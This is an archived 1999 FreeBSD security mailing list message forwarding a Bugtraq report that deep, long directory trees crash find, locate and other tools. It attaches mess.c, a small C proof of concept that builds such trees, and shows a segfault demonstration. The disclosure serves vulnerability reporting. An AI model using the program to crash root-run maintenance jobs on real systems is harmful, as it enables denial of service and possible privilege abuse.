Date: 04 May 1999 23:29:17 +0200 From: Dag-Erling Smorgrav <des@ifi.uio.no> To: security@freebsd.org Subject: [Przemyslaw Frasunek <venglin@LAGOON.FREEBSD.ORG.PL>] Re: Buffer overflow in ftpd and locate bug Message-ID: <xzpvhe8ttg2.fsf@hrotti.ifi.uio.no>
next in thread | raw e-mail | index | archive | help
------- Start of forwarded message -------
Message-ID: <19990502183800.1113.qmail@venglin.gadaczka.org>
Date: Sun, 2 May 1999 20:37:35 CEST
Reply-To: Przemyslaw Frasunek <venglin@LAGOON.FREEBSD.ORG.PL>
From: Przemyslaw Frasunek <venglin@LAGOON.FREEBSD.ORG.PL>
Subject: Re: Buffer overflow in ftpd and locate bug
To: BUGTRAQ@NETSPACE.ORG
--Message-Boundary-25450
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
> I had problem with locate from findutils-4.1.24.rpm from Redhat-5.1
> It segfaults if we have huge directory at incoming ftp which created
> by exploits for ftpd realpath hole. My ftpd is patched. Those exploits
> ,i think, should not afraid me, but if updatedb puts to locate database
> that directory then locate segfaults. ( getline.c 104 row by gdb )
> I guess it can be used for running arbitrary commands if root runs locate.
I've noticed a similar problem with /usr/bin/find on FreeBSD. By
creating _very_ long and deep directory structure it's possible
to segfault /usr/bin/find (it's also used in /etc/periodic scripts,
which runs on root).
Example:
I'm creating a directory structure with 300 subdirectories, each
255 chars length (source in attachment, also it's possible to do it
via ftpd, because it calls mkdir() and chdir()).
lagoon:venglin:/tmp/jc> find example > /dev/null
Segmentation fault (core dumped)
Gdb shows, that functions puts() was overflowed, when it tried to
print a very long path.
Also other system tools (rm, ls) has big problems with such
directory structures.
--
* Fido: 2:480/124 ** WWW: lagoon.freebsd.org.pl/~venglin ** GSM:48-601-383657 *
* Inet: venglin@lagoon.freebsd.org.pl ** PGP:D48684904685DF43EA93AFA13BE170BF *
--Message-Boundary-25450
Content-type: text/plain; charset=US-ASCII
Content-disposition: inline
Content-description: Attachment information.
The following section of this message contains a file attachment
prepared for transmission using the Internet MIME message format.
If you are using Pegasus Mail, or any another MIME-compliant system,
you should be able to save it or view it from within your mailer.
If you cannot, please ask your system administrator for assistance.
---- File information -----------
File: mess.c
Date: 2 May 1999, 19:01
Size: 748 bytes.
Type: Text
--Message-Boundary-25450
Content-type: Application/Octet-stream; name=mess.c; type=Text
Content-disposition: attachment; filename="mess.c"
#include <stdio.h>
#include <errno.h>
#include <sys/stat.h>
#include <strings.h>
#define DUMP 0x41
main(int argc, char *argv[]) {
char buf[255];
int i = 0;
if (argc < 3) { fprintf(stderr, "usage: %s <dir> <depth>\n", argv[0]); exit(1); }
if(chdir(argv[1])) { fprintf(stderr, "error in chdir(): %s\n", strerror(errno)); exit(1); }
memset(buf, DUMP, 255);
for(i=0;i<(atoi(argv[2]))-1;i++) {
if(mkdir(buf, (S_IRWXU | S_IRWXG | S_IRWXO))) { fprintf(stderr, "error in mkdir() after %d iterations: %s\n", i, strerror(errno)); exit(1); }
if(chdir(buf)) { fprintf(stderr, "error in chdir() after %d iterations: %s\n", i, strerror(errno)); exit(1); }
}
exit(0);
}
--Message-Boundary-25450--
------- End of forwarded message -------
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?xzpvhe8ttg2.fsf>